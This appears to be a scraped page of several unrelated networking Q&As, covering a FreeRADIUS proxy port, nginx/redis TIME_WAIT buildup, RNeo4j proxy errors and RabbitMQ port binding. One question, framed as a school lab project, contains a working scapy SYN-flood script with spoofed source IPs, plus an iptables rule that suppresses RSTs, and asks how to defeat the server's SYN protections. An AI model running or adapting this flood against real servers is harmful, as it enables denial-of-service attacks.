Develop Reference

Freeradius extra open port

I have server with available many subnets, I would like to my Freeradius only listen on specific IP addresses. I use freeradius configuration from Arch package freeradius-3.0.19-3. The only changes are:
removed IPv6 listen sections
in IPv4 listen section I configured listening address to ipaddr="192.168.1.1"
In my configuration I have also listening on 127.0.0.1:18120, but when I check open ports I got:
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:40012 0.0.0.0:* users:(("radiusd",pid=22199,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=22199,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=22199,fd=8))
This port 40012 is dynamic allocated after freeradius service restart the number is different.
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:42447 0.0.0.0:* users:(("radiusd",pid=26490,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=26490,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=26490,fd=8))
How to get rid of this port? What is a function of it?

This extra port is used for sending and receiving proxy packets. If you are not using proxying you can disable it in radiusd.conf, look for
proxy_requests = yes
$INCLUDE proxy.conf
change it to "no", and comment out the INCLUDE line.
If you want to change the address and/or port that is used, look at the listen sections in e.g. raddb/sites-enabled/default. You can add a new section with type = proxy to specifically set the address and port that is used.

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

nginx redis upstream lots of TIME_WAIT to some servers after adding a new bunch to upstream

I have nginx upstream of redis servers (5 servers with 4 redis instances on every) like following:
upstream redis_cluster {
server 10.0.1.8:6379 fail_timeout=0;
server 10.0.1.8:6380 fail_timeout=0;
server 10.0.1.8:6381 fail_timeout=0;
server 10.0.1.8:6382 fail_timeout=0;
server 10.0.1.6:6379 fail_timeout=0;
server 10.0.1.6:6380 fail_timeout=0;
server 10.0.1.6:6381 fail_timeout=0;
server 10.0.1.6:6382 fail_timeout=0;
...
keepalive 16;
}
After adding the last one server (last 4 redis instances, actually), I've noticed strange connections rise to some of them:
9684 10.0.0.17:6379 TIME_WAIT
3 10.0.0.17:6380 ESTABLISHED
9677 10.0.0.17:6380 TIME_WAIT
9664 10.0.0.17:6381 TIME_WAIT
6 10.0.0.17:6382 ESTABLISHED
9660 10.0.0.17:6382 TIME_WAIT
4 10.0.1.3:6379 ESTABLISHED
1 10.0.1.3:6379 SYN_SENT
9671 10.0.1.3:6379 TIME_WAIT
3 10.0.1.3:6380 ESTABLISHED
9665 10.0.1.3:6380 TIME_WAIT
1 10.0.1.3:6381 ESTABLISHED
9661 10.0.1.3:6381 TIME_WAIT
5 10.0.1.3:6382 ESTABLISHED
9660 10.0.1.3:6382 TIME_WAIT
5 10.0.0.7:6379 ESTABLISHED
9653 10.0.0.7:6379 TIME_WAIT
4 10.0.0.7:6380 ESTABLISHED
9663 10.0.0.7:6380 TIME_WAIT
1 10.0.0.7:6381 ESTABLISHED
9664 10.0.0.7:6381 TIME_WAIT
7 10.0.0.7:6382 ESTABLISHED
9667 10.0.0.7:6382 TIME_WAIT
5 10.0.1.8:6379 ESTABLISHED
9673 10.0.1.8:6379 TIME_WAIT
2 10.0.1.8:6380 ESTABLISHED
9676 10.0.1.8:6380 TIME_WAIT
4 10.0.1.8:6381 ESTABLISHED
9665 10.0.1.8:6381 TIME_WAIT
3 10.0.1.8:6382 ESTABLISHED
While after commenting out a last one server (last 4 upstream entries) everything came to normal:
4 10.0.0.10:6379 ESTABLISHED
4 10.0.0.10:6380 ESTABLISHED
4 10.0.0.10:6381 ESTABLISHED
1 10.0.0.10:6381 TIME_WAIT
4 10.0.0.10:6382 ESTABLISHED
4 10.0.1.3:6379 ESTABLISHED
4 10.0.1.3:6380 ESTABLISHED
4 10.0.1.3:6381 ESTABLISHED
4 10.0.1.3:6382 ESTABLISHED
4 10.0.0.7:6379 ESTABLISHED
4 10.0.0.7:6380 ESTABLISHED
4 10.0.0.7:6381 ESTABLISHED
4 10.0.0.7:6382 ESTABLISHED
4 10.0.1.8:6379 ESTABLISHED
4 10.0.1.8:6380 ESTABLISHED
4 10.0.1.8:6381 ESTABLISHED
4 10.0.1.8:6382 ESTABLISHED
What could be the root cause of this? Thanks in advance, comrades.

RNeoj: RStudio cannot connect to neo4j Database error 503 indicated

How can I get RStudio to connect to Neo4j database?
Problem:
The following error is indicated when I attempt
to connect to neo4j database via RStudio using startGraph :
Error:
Server error: (503) Service Unavailable
#load library
library(RNeo4j)
#connect to graphdb
graph = startGraph("http://localhost:7474/db/data/")
(dbm authenthication is disabled [dbms.security.auth_enabled=false])
(Also tried with authentication enabled (by passing db username and password to startGraph), however the same error was indicated)
graph = startGraph("http://localhost:7474/db/data",
username="xxxx", password="xxxx")
Initial Setup Check:
Confirmed successful installation and operation of Neo4j.
1.Database is started and running successfully via neo4j (3.0.1) console
2.Confirmed able to connect successfully via Chrome Browser
3.Confirmed able to create graph and conduct queries via Chrome Browser interface.
Environment Info
proxy is configured on system
RNeo4j version 1.6.4
RStudio V. 0.99.892
R version 3.2.4 (2016-03-10)
Platform: x86_64-w64-mingw32/x64 (64-bit)
Running under: Windows 7 x64 (build 7601) Service Pack 1
Additional Details
I don't have any issues with proxy and RStudio creating and running Shiny Apps or installing any R packages on system.
I performed a netstat to check connections on localhost ports only applications connected are Neo4j and Web Browsers, not RStudio. (Is it normal to have so many connections open at one time?)
d:\Windows\System32\drivers\etc>netstat -a -o -n |grep :7474
TCP 127.0.0.1:7474 0.0.0.0:0 LISTENING 15528
TCP 127.0.0.1:7474 127.0.0.1:50884 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50885 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50886 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50888 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50889 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50898 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50899 TIME_WAIT 0
TCP 127.0.0.1:7474 127.0.0.1:50913 ESTABLISHED 15528
TCP 127.0.0.1:7474 127.0.0.1:50914 ESTABLISHED 15528
TCP 127.0.0.1:7474 127.0.0.1:50915 ESTABLISHED 15528
TCP 127.0.0.1:7474 127.0.0.1:50916 ESTABLISHED 15528
TCP 127.0.0.1:7474 127.0.0.1:50917 ESTABLISHED 15528
TCP 127.0.0.1:7474 127.0.0.1:50918 ESTABLISHED 15528
TCP 127.0.0.1:50887 127.0.0.1:7474 TIME_WAIT 0
TCP 127.0.0.1:50900 127.0.0.1:7474 TIME_WAIT 0
TCP 127.0.0.1:50901 127.0.0.1:7474 TIME_WAIT 0
TCP 127.0.0.1:50902 127.0.0.1:7474 TIME_WAIT 0
TCP 127.0.0.1:50913 127.0.0.1:7474 ESTABLISHED 12356
TCP 127.0.0.1:50914 127.0.0.1:7474 ESTABLISHED 12356
TCP 127.0.0.1:50915 127.0.0.1:7474 ESTABLISHED 12356
TCP 127.0.0.1:50916 127.0.0.1:7474 ESTABLISHED 12356
TCP 127.0.0.1:50917 127.0.0.1:7474 ESTABLISHED 12356
TCP 127.0.0.1:50918 127.0.0.1:7474 ESTABLISHED 12356

I was able to successfully execute startGraph by bypassing the proxy for localhost.
Steps
1.I first troubleshooted the issue using curl outside at a windows command prompt using the [noproxy] option to successful conclusion (verified this works correctly):
curl -v --noproxy localhost, http://localhost:7474/db/data/
2.Then at the RStudio console I set my httr configuration (since it is same underlying curl interface) to use [noproxy] option by doing the following:
rstudio_console>set_config(config(noproxy = "localhost")) #set noproxy option
rstudio_console>set_config(config(verbose())) #set verbose to view http messages
3.Then execute startGraph with no options:
rstudio_console>> graph = startGraph("http://localhost:7474/db/data")
4.Voila Success:
rstudio_console> graph
< Graph >
$version
[1] "3.0.1"

Why does rabbitmq listen on port 43411?

I can't for the life of me get it to bind to 127.0.0.1:43411 instead of 0.0.0.0:43411. Any ideas?
beam.smp 18538 rabbitmq 10u IPv4 5797637 0t0 TCP *:43411 (LISTEN)
Rabbitmq had a few ports open, Making RabbitMQ listen only to the loopback interface? helped me bind some of them to loopback but this last one is persistent.

I think this port is configured with:
[{kernel, [{inet_dist_use_interface, {127, 0, 0, 1}}]}].
in config file